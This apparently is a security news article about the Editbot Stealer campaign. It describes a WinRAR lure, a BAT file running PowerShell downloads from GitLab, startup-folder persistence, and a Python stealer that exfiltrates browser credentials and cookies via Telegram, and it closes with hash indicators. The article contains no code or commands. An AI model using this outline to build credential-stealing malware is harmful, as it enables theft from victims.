A new malicious campaign, Editbot Stealer, was discovered in which threat actors use WinRAR archive files with minimal detection to perform a multi-stage attack. Threat actors have been utilizing the theme of “defective product to be sent back” to lure users to their deceptive websites.
However, the malicious WinRAR archive used by the threat actors consists of a .bat file and a JSON file for initial stage attacks, followed by some Powershell commands for further stages. The distribution of these malicious files was done through social media.
Editbot Stealer in Action
Initial Access & Persistence
According to the reports shared with Cyber Security News, the BAT file used in the initial stages of the attack goes by the name “Screenshot Product Photo Sample.bat” containing multiple Powershell commands for downloading and executing additional payloads.
The first PowerShell command inside the BAT file downloads another BAT file from Gitlab and saves it under the name “WindowsSecure.bat” in the startup folder for persistent execution. This BAT file is used to regularly execute the Python stealer, which is downloaded later in the attack stage.
The second PowerShell command retrieves a ZIP file named “Document.zip” from the same GitLab repository and saves it in the C:UsersPublic directory. The third powershell command extracts this ZIP file into the C:UsersPublicDocuments directory containing the python stealer “libb1.py”.
Working of the Python Stealer – Editbot
The Python stealer consists of sophisticated programming code that performs several functions, including extracting the country code, IP address, and timestamp of the victims, along with the credential-stealing activities associated with several browsers.
This stealer extracts multiple pieces of information, such as cookies, login data, web data, and local state, from the browser profile folder and stores them inside the %temp% folder. All of the stolen information is stored in a text file named “pass.txt”.
After collecting all the information from the victim, the stealer creates a ZIP archive of all the extracted information and stores them inside the same %temp% directory. To exfiltrate this information, the threat actors have set up telegram bots.
Furthermore, a complete report about the Editbot stealer has been published, which provides detailed information on the source code, extraction method, and other information.
Indicators of Compromise
| Indicators | Indicator Type | Details |
| fd8391a1a0115880e8c3ee2e76fbce741f1b3c5fbcb728b9fac37c21e9f6d7b7 feff390b99dfe7619a20748582279bc13c04f52aca5bee4607ddd920729e5c2b4fc89bbc | SHA256 SHA1MD5 | Screenshot-Product-Photo-Sample_25929.rar |
| d13aba752f86757de6628e833f4fdf4c625f480056e93b919172e9c309448b80 18e96d94089086848a0569a1e1d8051da0f6f444e9e4cd111cadcf94c469365354df3fdc | SHA256 SHA1MD5 | Screenshot Product Photo Sample.bat |
| 3f7bd47fbbf1fb0a63ba955c8f9139d6500b6737e5baf5fdb783f0cedae94d6d eed59a282588778ffbc772085b03d229a5d99e35669e7ac187fb57c4d90b07d9a6bb1d42 | SHA256 SHA1MD5 | Python stealer (libb1.py) |
| 9d048e99bed4ced4f37d91a29763257a1592adb2bc8e17a66fa07a922a0537d0 93d70f02b2ee2c4c2cd8262011ed21317c7d92def23465088d26e90514b5661936016c05 | SHA256 SHA1MD5 | product-_img_2023-12_86-13a30f_13373.rar |
| bc3993769a5f82e454acef92dc2362c43bf7d6b6b203db7db8803faa996229aa cf019e96e16fdaa504b29075aded36be27691956c3a447c5c6c73d80490347c1b4afe9d5 | SHA256 SHA1MD5 | image – photo_product _2023-12_86-13a30ff503fd6638c5863dta.bat |